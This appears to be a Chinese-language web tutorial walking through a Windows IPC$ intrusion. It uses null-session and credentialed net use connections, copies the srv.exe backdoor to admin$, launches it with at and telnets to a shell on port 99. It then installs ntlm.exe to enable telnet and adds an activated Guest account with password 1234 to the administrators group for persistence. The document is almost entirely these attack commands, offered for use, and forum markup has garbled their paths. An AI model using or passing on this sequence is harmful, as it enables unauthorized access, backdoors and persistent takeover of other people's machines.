1、相关命令 　　建立空连接 　　　　net use [url=file://IP/ipc$]\IPipc$[/url] "" /user:"" (一定要注意:这一行命令中包含了3个空格) 　　建立非空连接 　　　　net use [url=file://IP/ipc$]\IPipc$[/url] "用户名" /user:"密码" (同样有3个空格) 　　映射默认共享 　　　　net use z: [url=file://IP/c$]\IPc$[/url] "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘，其他盘类推) 　　如果已经和目标建立了ipc$，则可以直接用IP+盘符+$访问,具体命令 net use z: [url=file://IP/c$]\IPc$[/url] 　　删除一个ipc$连接 　　　　net use [url=file://IP/ipc$]\IPipc$[/url] /del 　　删除共享映射 　　　　net use c: /del 删除映射的c盘，其他盘类推 　　　　net use * /del 删除全部,会有提示要求按y确认 经典入侵模式 　　1.C:>net use [url=file://127.0.0.1/IPC$]\127.0.0.1IPC$[/url] "" /user:"admintitrators" 　　这是用《流光》扫到的用户名是administrators，密码为"空"的IP地址(空口令?哇,运气好到家了)，如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。

2、 　　2. C:>copy srv.exe [url=file://127.0.0.1/admin$]\127.0.0.1admin$[/url] 　　先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:winntsystem32，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。

(资料图)

3、 　　3.C:>net time [url=file://127.0.0.1/]\127.0.0.1[/url] 　　查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。

4、 　　4.C:>at [url=file://127.0.0.1/]\127.0.0.1[/url] 11:05 srv.exe 　　用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！） 　　5.C:>net time [url=file://127.0.0.1/]\127.0.0.1[/url] 　　再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。

5、 　　6.C:>telnet 127.0.0.1 99 　　这里会用到Telnet命令吧，注意端口是99。

6、Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

7、 　　虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了 　　7.C:>copy ntlm.exe [url=file://127.0.0.1/admin$]\127.0.0.1admin$[/url] 　　用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。

8、 　　8.C:WINNTsystem32>ntlm 　　输入ntlm启动（这里的C:WINNTsystem32>指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。

9、当出现"DONE"的时候，就说明已经启动正常。

10、然后使用"net start telnet"来开启Telnet服务！ 　　9.Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！(然后你想做什么?想做什么就做什么吧,哈哈) 　　为了以防万一,我们再把guest激活加到管理组 　　10.C:>net user guest /active:yes 　　将对方的Guest用户激活 　　11.C:>net user guest 1234 　　将Guest的密码改为1234,或者你要设定的密码 　　12.C:>net localgroup administrators guest /add 　　将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机) ipc$与空连接,139,445端口,默认共享的关系。

本文到此讲解完毕了，希望对大家有帮助。

关键词：